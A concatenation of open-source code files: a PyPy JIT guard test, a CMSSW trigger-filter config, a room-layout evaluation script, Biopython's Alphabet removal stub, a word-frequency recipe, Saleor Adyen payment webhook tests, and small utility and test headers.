vtable_B = llmemory.cast_adr_to_int(adr_vtable_B, mode="symbolic")
CPU = getcpuclass()
cpu = CPU(rtyper, NoStats(),
translate_support_code=True,
gcdescr=get_description(t.config))
execute_token = cpu.make_execute_token(llmemory.GCREF)
finaldescr = BasicFinalDescr()
faildescr = BasicFailDescr()
descr_B = cpu.sizeof(LLB, ptr_vtable_B)
typeid_B = descr_B.get_type_id()
fielddescr_B = cpu.fielddescrof(LLB, 'inst_foo')
LLD = lltype.GcStruct('D', ('dd', lltype.Signed))
descr_D = cpu.sizeof(LLD)
fielddescr_D = cpu.fielddescrof(LLD, 'dd')
ARRAY = lltype.GcArray(lltype.Signed)
arraydescr = cpu.arraydescrof(ARRAY)
loop1 = parse("""
[p0]
guard_class(p0, ConstInt(vtable_B), descr=faildescr) []
finish(descr=finaldescr)
""", namespace={'finaldescr': finaldescr,
'faildescr': faildescr,
'vtable_B': vtable_B})
loop2 = parse("""
[p0]
guard_gc_type(p0, ConstInt(typeid_B), descr=faildescr) []
finish(descr=finaldescr)
""", namespace={'finaldescr': finaldescr,
'faildescr': faildescr,
'typeid_B': typeid_B})
loop3 = parse("""
[p0]
guard_is_object(p0, descr=faildescr) []
finish(descr=finaldescr)
""", namespace={'finaldescr': finaldescr,
'faildescr': faildescr})
loop4 = parse("""
[p0]
guard_subclass(p0, ConstInt(vtable_B), descr=faildescr) []
finish(descr=finaldescr)
""", namespace={'finaldescr': finaldescr,
'faildescr': faildescr,
'vtable_B': vtable_B})
def g():
cpu.setup_once()
token1 = JitCellToken()
token2 = JitCellToken()
token3 = JitCellToken()
token4 = JitCellToken()
cpu.compile_loop(loop1.inputargs, loop1.operations, token1)
cpu.compile_loop(loop2.inputargs, loop2.operations, token2)
cpu.compile_loop(loop3.inputargs, loop3.operations, token3)
cpu.compile_loop(loop4.inputargs, loop4.operations, token4)
for token, p0 in [
(token1, rffi.cast(llmemory.GCREF, A())),
(token1, rffi.cast(llmemory.GCREF, B())),
(token1, rffi.cast(llmemory.GCREF, C())),
(token2, rffi.cast(llmemory.GCREF, A())),
(token2, rffi.cast(llmemory.GCREF, B())),
(token2, rffi.cast(llmemory.GCREF, C())),
(token2, rffi.cast(llmemory.GCREF, [42, 43])),
(token3, rffi.cast(llmemory.GCREF, A())),
(token3, rffi.cast(llmemory.GCREF, B())),
(token3, rffi.cast(llmemory.GCREF, [44, 45])),
(token4, rffi.cast(llmemory.GCREF, A())),
(token4, rffi.cast(llmemory.GCREF, B())),
(token4, rffi.cast(llmemory.GCREF, C())),
]:
frame = execute_token(token, p0)
descr = cpu.get_latest_descr(frame)
if descr is finaldescr:
print 'match'
elif descr is faildescr:
print 'fail'
else:
print '???'
#
if token is token2: # guard_gc_type
print int(cpu.get_actual_typeid(p0) == typeid_B)
if token is token3: # guard_is_object
print int(cpu.check_is_object(p0))
for p0 in [lltype.nullptr(llmemory.GCREF.TO),
rffi.cast(llmemory.GCREF, A()),
rffi.cast(llmemory.GCREF, B()),
rffi.cast(llmemory.GCREF, C()),
rffi.cast(llmemory.GCREF, lltype.malloc(LLD)),
rffi.cast(llmemory.GCREF, lltype.malloc(ARRAY, 5)),
rffi.cast(llmemory.GCREF, "foobar"),
rffi.cast(llmemory.GCREF, u"foobaz")]:
results = ['B', 'D', 'A', 'S', 'U']
try:
cpu.protect_speculative_field(p0, fielddescr_B)
except SpeculativeError:
results[0] = '-'
try:
cpu.protect_speculative_field(p0, fielddescr_D)
except SpeculativeError:
results[1] = '-'
try:
cpu.protect_speculative_array(p0, arraydescr)
except SpeculativeError:
results[2] = '-'
try:
cpu.protect_speculative_string(p0)
except SpeculativeError:
results[3] = '-'
try:
cpu.protect_speculative_unicode(p0)
except SpeculativeError:
results[4] = '-'
print ''.join(results)
call_initial_function(t, g)
cbuilder = genc.CStandaloneBuilder(t, main, t.config)
cbuilder.generate_source(defines=cbuilder.DEBUG_DEFINES)
cbuilder.compile()
data = cbuilder.cmdexec('')
assert data == ('fail\n'
'match\n'
'fail\n'
'fail\n' '0\n'
'match\n' '1\n'
'fail\n' '0\n'
'fail\n' '0\n'
'match\n' '1\n'
'match\n' '1\n'
'fail\n' '0\n'
'fail\n'
'match\n'
'match\n'
'-----\n' # null
'-----\n' # instance of A
'B----\n' # instance of B
'B----\n' # instance of C
'-D---\n'
'--A--\n'
'---S-\n'
'----U\n'
)
def test_guards_translated_with_gctypeptr():
run_guards_translated(gcremovetypeptr=False)
def test_guards_translated_without_gctypeptr():
run_guards_translated(gcremovetypeptr=True)
|
HLTrigger/HLTfilters/test/hltHighLevel.py | ckamtsikis/cmssw | 852 | 12718931 | <filename>HLTrigger/HLTfilters/test/hltHighLevel.py
import FWCore.ParameterSet.Config as cms
process = cms.Process('TEST')
process.options = cms.untracked.PSet(
wantSummary = cms.untracked.bool(True)
)
process.load('FWCore.MessageService.MessageLogger_cfi')
process.MessageLogger.cerr.INFO = cms.untracked.PSet(
reportEvery = cms.untracked.int32(1), # every!
limit = cms.untracked.int32(-1) # no limit!
)
process.MessageLogger.cerr.FwkReport.reportEvery = 10 # only report every 10th event start
process.MessageLogger.cerr_stats.threshold = 'INFO' # also info in statistics
# read back the trigger decisions
process.source = cms.Source('PoolSource',
fileNames = cms.untracked.vstring('file:trigger.root')
)
import HLTrigger.HLTfilters.hltHighLevel_cfi as hlt
# accept if 'path_1' succeeds
process.filter_1 = hlt.hltHighLevel.clone(
HLTPaths = [ 'path_1'],
throw = False
)
# accept if 'path_2' succeeds
process.filter_2 = hlt.hltHighLevel.clone(
HLTPaths = ['path_2'],
throw = False
)
# accept if 'path_3' succeeds
process.filter_3 = hlt.hltHighLevel.clone(
HLTPaths = ['path_3'],
throw = False
)
# accept if any path succeeds (implicit)
process.filter_any_implicit = hlt.hltHighLevel.clone(
# HLTPaths = [], # empty is default
throw = False
)
# accept if any path succeeds (explicit)
process.filter_any_explicit = hlt.hltHighLevel.clone(
HLTPaths = ['path_1', 'path_2', 'path_3'],
throw = False
)
# accept if any path succeeds (wildcard, '*')
process.filter_any_star = hlt.hltHighLevel.clone(
HLTPaths = ['p*'],
throw = False
)
# accept if any path succeeds (wildcard, twice '*')
process.filter_any_doublestar = hlt.hltHighLevel.clone(
HLTPaths = ['p*t*'],
throw = False
)
# accept if any path succeeds (wildcard, '?')
process.filter_any_question = hlt.hltHighLevel.clone(
HLTPaths = ['path_?'],
throw = False
)
# accept if all path succeed (implicit)
process.filter_all_implicit = hlt.hltHighLevel.clone(
#HLTPaths = [], # empty is default
andOr = False,
throw = False
)
# accept if all path succeed (explicit)
process.filter_all_explicit = hlt.hltHighLevel.clone(
HLTPaths = ['path_1', 'path_2', 'path_3'],
andOr = False,
throw = False
)
# accept if all path succeed (wildcard, '*')
process.filter_all_star = hlt.hltHighLevel.clone(
HLTPaths = ['p*'],
andOr = False,
throw = False
)
# accept if all path succeed (wildcard, '*')
process.filter_all_doublestar = hlt.hltHighLevel.clone(
HLTPaths = ['p*t*'],
andOr = False,
throw = False
)
# accept if all path succeed (wildcard, '?')
process.filter_all_question = hlt.hltHighLevel.clone(
HLTPaths = ['path_?'],
andOr = False,
throw = False
)
# wrong L1 name (explicit)
process.filter_wrong_name = hlt.hltHighLevel.clone(
HLTPaths = ['path_wrong'],
throw = False
)
# wrong L1 name (wildcard)
process.filter_wrong_pattern = hlt.hltHighLevel.clone(
HLTPaths = ['*_wrong'],
throw = False
)
## start testing AlCaRecoTriggerBits ##############################
##
## This works after having run a modified version of
## cmsRun src/CondTools/HLT/test/AlCaRecoTriggerBitsRcdWrite_cfg.py
## Simply remove overwriting of
## process.AlCaRecoTriggerBitsRcdWrite.triggerLists ...
##
## AlCaRecoTriggerBits
#process.filter_AlCaRecoTriggerBits = hlt.hltHighLevel.clone(
# eventSetupPathsKey = 'test13', #'TkAlMinBias',
# throw = False # True
#)
#
## DB input
#import CondCore.DBCommon.CondDBSetup_cfi
#process.dbInput = cms.ESSource(
# "PoolDBESSource",
# CondCore.DBCommon.CondDBSetup_cfi.CondDBSetup,
# connect = cms.string('sqlite_file:AlCaRecoTriggerBits.db'),
# toGet = cms.VPSet(cms.PSet(
# record = cms.string('AlCaRecoTriggerBitsRcd'),
# tag = cms.string('TestTag') # choose tag you want
# )
# )
# )
#process.end_AlCaRecoTriggerBits = cms.Path( process.filter_AlCaRecoTriggerBits )
##
## end testing AlCaRecoTriggerBits ################################
process.end_1 = cms.Path( process.filter_1 )
process.end_2 = cms.Path( process.filter_2 )
process.end_3 = cms.Path( process.filter_3 )
process.end_any_implicit = cms.Path( process.filter_any_implicit )
process.end_any_explicit = cms.Path( process.filter_any_explicit )
process.end_any_star = cms.Path( process.filter_any_star )
process.end_any_doublestar = cms.Path( process.filter_any_doublestar )
process.end_any_question = cms.Path( process.filter_any_question )
#process.end_any_filter = cms.Path( ~ ( ~ process.filter_1 + ~ process.filter_2 + ~ process.filter_3) )
process.end_all_implicit = cms.Path( process.filter_all_implicit )
process.end_all_explicit = cms.Path( process.filter_all_explicit )
process.end_all_star = cms.Path( process.filter_all_star )
process.end_all_doublestar = cms.Path( process.filter_all_doublestar )
process.end_all_question = cms.Path( process.filter_all_question )
process.end_all_filter = cms.Path( process.filter_1 + process.filter_2 + process.filter_3 )
process.end_wrong_name = cms.Path( process.filter_wrong_name )
process.end_wrong_pattern = cms.Path( process.filter_wrong_pattern )
process.end_not_wrong_pattern = cms.Path( ~process.filter_wrong_pattern )
# define an EndPath to analyze all other path results
process.hltTrigReport = cms.EDAnalyzer( 'HLTrigReport',
HLTriggerResults = cms.InputTag( 'TriggerResults','','TEST' )
)
process.HLTAnalyzerEndpath = cms.EndPath( process.hltTrigReport )
|
test_matterport.py | kopetri/LayoutNetv2 | 166 | 12718942 | from __future__ import print_function
from __future__ import division
import torch
import torch.nn as nn
import torch.optim as optim
import numpy as np
print("PyTorch Version: ",torch.__version__)
import pickle
import os
import scipy.io as sio
import cv2
from model import *
from pano import get_ini_cor
from pano_opt_gen import optimize_cor_id
import post_proc2 as post_proc
from shapely.geometry import Polygon
from scipy.ndimage.filters import maximum_filter
from scipy.ndimage import convolve
import scipy.signal
import sys
from sklearn.metrics import classification_report
# general case
# Top level data directory. Here we assume the format of the directory conforms
# to the ImageFolder structure
test_path = './data/matterport/mp3d_align/'
weight_path = './model/resnet34_matterport.pth'
save_path = './result_gen/'
depth_path = './result_gen_depth/'
depth_path_gt = './data/matterport/share_depth/'
# Pre-trained models to choose from [resnet18, resnet34, resnet50]
#model_name = "resnet18"
model_name = "resnet34"
#model_name = "resnet50"
num_classes = 1024
print("Load Models...")
# Define the encoder
encoder = initialize_encoder(model_name, num_classes,use_pretrained=True)
# Full model
model_ft = SegNet(encoder, num_classes)
model_ft.load_state_dict(torch.load(weight_path))
# Detect if we have a GPU available
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
# Send the model to GPU
model_ft = model_ft.to(device)
# evaluation mode
model_ft.eval()
def find_N_peaks(signal, r=29, min_v=0.05, N=None):
max_v = maximum_filter(signal, size=r, mode='wrap')
pk_loc = np.where(max_v == signal)[0]
pk_loc = pk_loc[signal[pk_loc] > min_v]
# check for odd case, remove one
if (pk_loc.shape[0]%2)!=0:
pk_id = np.argsort(-signal[pk_loc])
pk_loc = pk_loc[pk_id[:-1]]
pk_loc = np.sort(pk_loc)
if N is not None:
order = np.argsort(-signal[pk_loc])
pk_loc = pk_loc[order[:N]]
pk_loc = pk_loc[np.argsort(pk_loc)]
return pk_loc, signal[pk_loc]
def find_N_peaks_conv(signal, prominence, distance, N=4):
locs, _ = scipy.signal.find_peaks(signal,
prominence=prominence,
distance=distance)
pks = signal[locs]
pk_id = np.argsort(-pks)
pk_loc = locs[pk_id[:min(N, len(pks))]]
pk_loc = np.sort(pk_loc)
return pk_loc, signal[pk_loc]
def get_ini_cor(cor_img, d1=21, d2=3):
cor = convolve(cor_img, np.ones((d1, d1)), mode='constant', cval=0.0)
cor_id = []
cor_ = cor_img.sum(0)
cor_ = (cor_-np.amin(cor_))/np.ptp(cor_)
min_v = 0.25#0.05
xs_ = find_N_peaks(cor_, r=26, min_v=min_v, N=None)[0]
    # special case: too few corners detected, relax the threshold
if xs_.shape[0] < 4:
xs_ = find_N_peaks(cor_, r=26, min_v=0.05, N=None)[0]
if xs_.shape[0] < 4:
xs_ = find_N_peaks(cor_, r=26, min_v=0, N=None)[0]
X_loc = xs_
for x in X_loc:
x_ = int(np.round(x))
V_signal = cor[:, max(0, x_-d2):x_+d2+1].sum(1)
y1, y2 = find_N_peaks_conv(V_signal, prominence=None,
distance=20, N=2)[0]
cor_id.append((x, y1))
cor_id.append((x, y2))
cor_id = np.array(cor_id, np.float64)
return cor_id
def test_general(dt_cor_id, gt_cor_id, w, h, losses):
dt_floor_coor = dt_cor_id[1::2]
dt_ceil_coor = dt_cor_id[0::2]
gt_floor_coor = gt_cor_id[1::2]
gt_ceil_coor = gt_cor_id[0::2]
assert (dt_floor_coor[:, 0] != dt_ceil_coor[:, 0]).sum() == 0
assert (gt_floor_coor[:, 0] != gt_ceil_coor[:, 0]).sum() == 0
# Eval 3d IoU and height error(in meter)
N = len(dt_floor_coor)
ch = -1.6
dt_floor_xy = post_proc.np_coor2xy(dt_floor_coor, ch, 1024, 512, floorW=1, floorH=1)
gt_floor_xy = post_proc.np_coor2xy(gt_floor_coor, ch, 1024, 512, floorW=1, floorH=1)
dt_poly = Polygon(dt_floor_xy)
gt_poly = Polygon(gt_floor_xy)
area_dt = dt_poly.area
area_gt = gt_poly.area
if area_dt < 1e-05:
print('too small room')
# Add a result
n_corners = len(gt_floor_coor)
n_corners = str(n_corners) if n_corners < 14 else '14+'
losses[n_corners]['2DIoU'].append(0)
losses[n_corners]['3DIoU'].append(0)
losses['overall']['2DIoU'].append(0)
losses['overall']['3DIoU'].append(0)
return
area_inter = dt_poly.intersection(gt_poly).area
area_union = dt_poly.union(gt_poly).area
area_pred_wo_gt = dt_poly.difference(gt_poly).area
area_gt_wo_pred = gt_poly.difference(dt_poly).area
iou2d = area_inter / (area_gt + area_dt - area_inter)
cch_dt = post_proc.get_z1(dt_floor_coor[:, 1], dt_ceil_coor[:, 1], ch, 512)
cch_gt = post_proc.get_z1(gt_floor_coor[:, 1], gt_ceil_coor[:, 1], ch, 512)
h_dt = abs(cch_dt.mean() - ch)
h_gt = abs(cch_gt.mean() - ch)
#iouH = min(h_dt, h_gt) / max(h_dt, h_gt)
#iou3d = iou2d * iouH
iou3d = (area_inter * min(h_dt, h_gt)) / (area_pred_wo_gt * h_dt + area_gt_wo_pred * h_gt + area_inter * max(h_dt, h_gt))
# Add a result
n_corners = len(gt_floor_coor)
n_corners = str(n_corners) if n_corners < 14 else '14+'
losses[n_corners]['2DIoU'].append(iou2d)
losses[n_corners]['3DIoU'].append(iou3d)
losses['overall']['2DIoU'].append(iou2d)
losses['overall']['3DIoU'].append(iou3d)
# Load data
gt_txt_path = '/data/czou4/Layout/_final_label_v2/test.txt'
namelist = []
with open(gt_txt_path, 'r') as f:
while(True):
line = f.readline().strip()
if not line:
break
namelist.append(line)
criterion = nn.BCELoss()
criterion2 = nn.BCELoss()
cnt = 0
num = 0
loss_cor = 0.0
loss_pe = 0.0
loss_3d = 0.0
loss_sum = 0.0
losses = dict([
(n_corner, {'2DIoU': [], '3DIoU': [], 'rmse':[], 'delta_1':[]})
for n_corner in ['4', '6', '8', '10', '12', '14+', 'overall']
])
# for precision recall
target_names = ['4 corners', '6 corners', '8 corners', '10 corners', '12 corners', '14 corners', '16 corners', '18 corners']
y_true = np.zeros(len(namelist))
y_pred = np.zeros(len(namelist))
for file_list in namelist:
#file_list = np.random.choice(namelist, 1)
#file_list = file_list[0]
print(file_list)
file_list_sub = file_list.split(" ")
pkl_path = os.path.join(test_path,file_list_sub[0],file_list_sub[1])
img = cv2.imread(os.path.join(pkl_path,'aligned_rgb.png'))
img = img.astype('float32')/255.0
mask = cv2.imread(os.path.join(pkl_path,'aligned_line.png'))
mask = mask.astype('float32')/255.0
gt = np.loadtxt(os.path.join(pkl_path,'cor.txt'))
# lr flip
img2 = np.fliplr(img).copy()
mask2 = np.fliplr(mask).copy()
image = torch.tensor(img).to(device).float()
masks = torch.tensor(mask).to(device).float()
inputs = image.permute(2,0,1)
inputs = inputs.unsqueeze(0)
masks = masks.permute(2,0,1)
masks = masks.unsqueeze(0)
inputs = torch.cat((inputs,masks),1)
image2 = torch.tensor(img2).to(device).float()
masks2 = torch.tensor(mask2).to(device).float()
inputs2 = image2.permute(2,0,1)
inputs2 = inputs2.unsqueeze(0)
masks2 = masks2.permute(2,0,1)
masks2 = masks2.unsqueeze(0)
inputs2 = torch.cat((inputs2,masks2),1)
inputs = torch.cat((inputs, inputs2),0)
# forward
outputs, outputs2 = model_ft(inputs)
# lr flip and take mean
outputs1 = outputs[1]
outputs22 = outputs2[1]
inv_idx = torch.arange(outputs1.size(2)-1, -1, -1).to(device).long()
outputs1 = outputs1.index_select(2, inv_idx)
outputs = torch.mean(torch.cat((outputs[0].unsqueeze(0), outputs1.unsqueeze(0)), 0), 0, True)
outputs22 = outputs22.index_select(2, inv_idx)
outputs2 = torch.mean(torch.cat((outputs2[0].unsqueeze(0), outputs22.unsqueeze(0)), 0), 0, True)
outputs = outputs.squeeze(0).permute(1,2,0)
outputs2 = outputs2.squeeze(0).squeeze(0)
inputs = inputs[0].permute(1,2,0)
#gradient ascent refinement
cor_img = outputs2.data.cpu().numpy()
edg_img = outputs.data.cpu().numpy()
    # general layout, top-down view
cor_ = cor_img.sum(0)
cor_ = (cor_-np.amin(cor_))/np.ptp(cor_)
min_v = 0.25#0.05
xs_ = find_N_peaks(cor_, r=26, min_v=min_v, N=None)[0]
    # special case: too few corners detected, relax the threshold
if xs_.shape[0] < 4:
xs_ = find_N_peaks(cor_, r=26, min_v=0.05, N=None)[0]
if xs_.shape[0] < 4:
xs_ = find_N_peaks(cor_, r=26, min_v=0, N=None)[0]
# get ceil and floor line
ceil_img = edg_img[:,:,1]
floor_img = edg_img[:,:,2]
ceil_idx = np.argmax(ceil_img, axis=0)
floor_idx = np.argmax(floor_img, axis=0)
# Init floor/ceil plane
z0 = 50
force_cuboid=False
_, z1 = post_proc.np_refine_by_fix_z(ceil_idx, floor_idx, z0)
# Generate general wall-wall
cor, xy_cor = post_proc.gen_ww(xs_, ceil_idx, z0, tol=abs(0.16 * z1 / 1.6), force_cuboid=force_cuboid)
if not force_cuboid:
# Check valid (for fear self-intersection)
xy2d = np.zeros((len(xy_cor), 2), np.float32)
for i in range(len(xy_cor)):
xy2d[i, xy_cor[i]['type']] = xy_cor[i]['val']
xy2d[i, xy_cor[i-1]['type']] = xy_cor[i-1]['val']
if not Polygon(xy2d).is_valid:
            # not actually forcing a cuboid: just assume all corners are visible and
            # fall back to the original LayoutNet initialization
#print(
# 'Fail to generate valid general layout!! '
# 'Generate cuboid as fallback.',
# file=sys.stderr)
cor_id = get_ini_cor(cor_img, 21, 3)
force_cuboid= True
if not force_cuboid:
# Expand with btn coory
cor = np.hstack([cor, post_proc.infer_coory(cor[:, 1], z1 - z0, z0)[:, None]])
# Collect corner position in equirectangular
cor_id = np.zeros((len(cor)*2, 2), np.float32)
for j in range(len(cor)):
cor_id[j*2] = cor[j, 0], cor[j, 1]
cor_id[j*2 + 1] = cor[j, 0], cor[j, 2]
# refinement
cor_id = optimize_cor_id(cor_id, edg_img, cor_img, num_iters=100, verbose=False)
test_general(cor_id, gt, 1024, 512, losses)
# save, uncomment to generate depth map
#print(save_path+file_list_sub[0]+'_'+file_list_sub[1]+'.mat')
#sio.savemat(save_path+file_list_sub[0]+'_'+file_list_sub[1]+'.mat',{'cor_id':cor_id})
#load
pred_depth = depth_path+file_list_sub[0]+'_'+file_list_sub[1]+'.mat'
if os.path.exists(pred_depth):
pred_depth = sio.loadmat(pred_depth)
pred_depth = pred_depth['im_depth']
#gt
gt_depth = np.load(os.path.join(depth_path_gt, file_list_sub[0], file_list_sub[1], 'new_depth.npy'))
pred_depth = cv2.resize(pred_depth, (gt_depth.shape[1], gt_depth.shape[0]))
# rmse
pred_depth = pred_depth[np.nonzero(gt_depth)]
gt_depth = gt_depth[np.nonzero(gt_depth)]
rmse = np.average((gt_depth - pred_depth) ** 2) ** 0.5
# delta_1
max_map = np.where(gt_depth/pred_depth > pred_depth/gt_depth, gt_depth/pred_depth, pred_depth/gt_depth)
delta_1 = np.average(np.where(max_map < 1.25, 1, 0))
# Add a result
n_corners = len(gt[1::2])
n_corners = str(n_corners) if n_corners < 14 else '14+'
losses[n_corners]['rmse'].append(rmse)
losses[n_corners]['delta_1'].append(delta_1)
losses['overall']['rmse'].append(rmse)
losses['overall']['delta_1'].append(delta_1)
torch.cuda.empty_cache()
#del outputs1, outputs, outputs2, outputs22, labels, labels2, inputs, inputs2, loss
del outputs1, outputs, outputs2, outputs22, inputs, inputs2
y_true[cnt] = int(gt.shape[0]//2//2-2)
y_pred[cnt] = int(cor_id.shape[0]//2//2-2)
cnt += 1
num += 1
iou2d = np.array(losses['overall']['2DIoU'])
iou3d = np.array(losses['overall']['3DIoU'])
rmse = np.array(losses['overall']['rmse'])
delta_1 = np.array(losses['overall']['delta_1'])
print('No. {}, 2d Loss: {:.6f}, 3d Loss: {:.6f}, rmse: {:.6f}, delta_1: {:.6f}'.format(cnt,iou2d.mean() * 100,iou3d.mean() * 100, rmse.mean() *100, delta_1.mean()*100))
for k, result in losses.items():
iou2d = np.array(result['2DIoU'])
iou3d = np.array(result['3DIoU'])
rmse = np.array(result['rmse'])
delta_1 = np.array(result['delta_1'])
if len(iou2d) == 0:
continue
print('GT #Corners: %s (%d instances)' % (k, len(iou2d)))
print(' 2DIoU: %.2f' % ( iou2d.mean() * 100))
print(' 3DIoU: %.2f' % ( iou3d.mean() * 100))
print(' RMSE: %.2f' % ( rmse.mean()*100))
print(' Delta_1: %.2f' % ( delta_1.mean()*100))
print(classification_report(y_true, y_pred, target_names=target_names))
|
test/SIM_test_ip/Modified_data/next_level.py | gilbertguoze/trick | 647 | 12718961 |
test.ip.c_pointer_types.cpp[0][0][0] = ["Cat" , "Dog"]
test.ip.c_pointer_types.cpp[0][0][1] = ["Horse"]
|
Bio/Alphabet/__init__.py | lukasz-kozlowski/biopython | 2,856 | 12718973 | <reponame>lukasz-kozlowski/biopython
# Copyright 2000-2002 by <NAME>.
# Revisions copyright 2007-2010 by <NAME>.
# All rights reserved.
#
# This file is part of the Biopython distribution and governed by your
# choice of the "Biopython License Agreement" or the "BSD 3-Clause License".
# Please see the LICENSE file that should have been included as part of this
# package.
"""Alphabets were previously used to declare sequence type and letters (OBSOLETE).
The design of Bio.Alphabet included a number of historic design choices
which, with the benefit of hindsight, were regrettable. Bio.Alphabet was
therefore removed from Biopython in release 1.78. Instead, the molecule type is
included as an annotation on SeqRecords where appropriate.
Please see https://biopython.org/wiki/Alphabet for examples showing how to
transition from Bio.Alphabet to molecule type annotations.
"""
raise ImportError(
"Bio.Alphabet has been removed from Biopython. In many cases, the alphabet can simply be ignored and removed from scripts. In a few cases, you may need to specify the ``molecule_type`` as an annotation on a SeqRecord for your script to work correctly. Please see https://biopython.org/wiki/Alphabet for more information."
)
|
recipes/Python/578851_BentleyKnuth_problem/recipe-578851.py | tdiprima/code | 2,023 | 12718993 | # bentley_knuth.py
# Author: <NAME> - http://www.dancingbison.com
# Version: 0.1
# The problem this program tries to solve is from the page:
# http://www.leancrew.com/all-this/2011/12/more-shell-less-egg/
# Description: The program Bentley asked Knuth to write:
# Read a file of text, determine the n most frequently
# used words, and print out a sorted list of those words
# along with their frequencies.
import sys
import os
import string
sys_argv = sys.argv
def usage():
sys.stderr.write("Usage: %s n file\n" % sys_argv[0])
sys.stderr.write("where n is the number of most frequently\n")
sys.stderr.write("used words you want to find, and \n")
sys.stderr.write("file is the name of the file in which to look.\n")
if len(sys_argv) < 3:
usage()
sys.exit(1)
try:
n = int(sys_argv[1])
except ValueError:
sys.stderr.write("%s: Error: %s is not a decimal numeric value" % (sys_argv[0],
sys_argv[1]))
sys.exit(1)
print "n =", n
if n < 1:
sys.stderr.write("%s: Error: %s is not a positive value" %
(sys_argv[0], sys_argv[1]))
in_filename = sys.argv[2]
print "%s: Finding %d most frequent words in file %s" % \
(sys_argv[0], n, in_filename)
try:
fil_in = open(in_filename)
except IOError:
sys.stderr.write("%s: ERROR: Could not open in_filename %s\n" % \
(sys_argv[0], in_filename))
sys.exit(1)
word_freq_dict = {}
for lin in fil_in:
words_in_line = lin.split()
for word in words_in_line:
if word_freq_dict.has_key(word):
word_freq_dict[word] += 1
else:
word_freq_dict[word] = 1
word_freq_list = []
for item in word_freq_dict.items():
word_freq_list.append(item)
wfl = sorted(word_freq_list,
key=lambda word_freq_list: word_freq_list[1], reverse=True)
#wfl.reverse()
print "The %d most frequent words sorted by decreasing frequency:" % n
len_wfl = len(wfl)
if n > len_wfl:
print "n = %d, file has only %d unique words," % (n, len_wfl)
print "so printing %d words" % len_wfl
print "Word: Frequency"
m = min(n, len_wfl)
for i in range(m):
print wfl[i][0], ": ", wfl[i][1]
fil_in.close()
|
saleor/payment/gateways/adyen/tests/webhooks/test_get_or_create_adyen_partial_payments.py | victor-abz/saleor | 1,392 | 12719000 | <filename>saleor/payment/gateways/adyen/tests/webhooks/test_get_or_create_adyen_partial_payments.py
from decimal import Decimal
from ...webhooks import get_or_create_adyen_partial_payments
def test_get_or_create_adyen_partial_payments_with_additional_actions_response(
payment_adyen_for_checkout,
):
# given
notification_data = {
"additionalData": {
"order-2-paymentMethod": "visa",
"threeds2.cardEnrolled": "false",
"order-2-pspReference": "861643021198177D",
"order-2-paymentAmount": "GBP 16.29",
"recurringProcessingModel": "Subscription",
"paymentMethod": "visa",
"order-1-pspReference": "861643021155073F",
"order-1-paymentAmount": "GBP 14.71",
"order-1-paymentMethod": "givex",
},
"pspReference": "861643021198177D",
"resultCode": "Authorised",
"merchantReference": "UGF5bWVudDoyNw==",
"paymentMethod": "visa",
"shopperLocale": "en_GB",
}
checkout = payment_adyen_for_checkout.checkout
# when
get_or_create_adyen_partial_payments(notification_data, payment_adyen_for_checkout)
# then
partial_payments = list(checkout.payments.exclude(id=payment_adyen_for_checkout.id))
assert len(partial_payments) == 2
assert all([payment.is_active is False for payment in partial_payments])
assert all([payment.partial is True for payment in partial_payments])
assert all([payment.is_active is False for payment in partial_payments])
assert any(payment.total == Decimal("14.71") for payment in partial_payments)
assert any(payment.total == Decimal("16.29") for payment in partial_payments)
assert any(
payment.psp_reference == "861643021155073F" for payment in partial_payments
)
assert any(
payment.psp_reference == "861643021198177D" for payment in partial_payments
)
def test_get_or_create_adyen_partial_payments_with_notification_payload(
notification, payment_adyen_for_checkout
):
# given
notification_data = notification()
notification_data["additionalData"] = {
"order-2-paymentMethod": "visa",
"order-2-pspReference": "881643125782168B",
"order-2-paymentAmount": "GBP 29.10",
"order-1-pspReference": "861643125754056E",
"order-1-paymentAmount": "GBP 41.90",
"order-1-paymentMethod": "givex",
}
checkout = payment_adyen_for_checkout.checkout
# when
get_or_create_adyen_partial_payments(notification_data, payment_adyen_for_checkout)
# then
partial_payments = list(checkout.payments.exclude(id=payment_adyen_for_checkout.id))
assert len(partial_payments) == 2
assert all([payment.is_active is False for payment in partial_payments])
assert all([payment.partial is True for payment in partial_payments])
assert all([payment.is_active is False for payment in partial_payments])
assert any(payment.total == Decimal("29.10") for payment in partial_payments)
assert any(payment.total == Decimal("41.90") for payment in partial_payments)
assert any(
payment.psp_reference == "881643125782168B" for payment in partial_payments
)
assert any(
payment.psp_reference == "861643125754056E" for payment in partial_payments
)
|
addon-sdk-1.17/python-lib/cuddlefish/util.py | hankduan/firefoxExtension | 102 | 12719012 | # This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
IGNORED_FILE_PREFIXES = ["."]
IGNORED_FILE_SUFFIXES = ["~", ".swp"]
IGNORED_DIRS = [".git", ".svn", ".hg"]
def filter_filenames(filenames, ignored_files=[".hgignore"]):
for filename in filenames:
if filename in ignored_files:
continue
        if any([filename.startswith(prefix)
                for prefix in IGNORED_FILE_PREFIXES]):
continue
if any([filename.endswith(suffix)
for suffix in IGNORED_FILE_SUFFIXES]):
continue
yield filename
def filter_dirnames(dirnames):
return [dirname for dirname in dirnames if dirname not in IGNORED_DIRS]
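
# Typical use (sketch, not part of the original module): prune ignored
# directories in place while walking a tree, and skip ignored file names.
#
#   import os
#   for dirpath, dirnames, filenames in os.walk(root_dir):    # root_dir is hypothetical
#       dirnames[:] = filter_dirnames(dirnames)
#       for filename in filter_filenames(filenames):
#           process(os.path.join(dirpath, filename))           # process() is hypothetical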
|
cloudbaseinit/tests/plugins/windows/test_azureguestagent.py | andia10240/cloudbase-init | 160 | 12719031 | <reponame>andia10240/cloudbase-init<filename>cloudbaseinit/tests/plugins/windows/test_azureguestagent.py
# Copyright (c) 2017 Cloudbase Solutions Srl
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import datetime
import importlib
import os
import unittest
try:
import unittest.mock as mock
except ImportError:
import mock
from cloudbaseinit import conf as cloudbaseinit_conf
from cloudbaseinit import exception
from cloudbaseinit.plugins.common import base
from cloudbaseinit.tests import testutils
CONF = cloudbaseinit_conf.CONF
MODPATH = "cloudbaseinit.plugins.windows.azureguestagent"
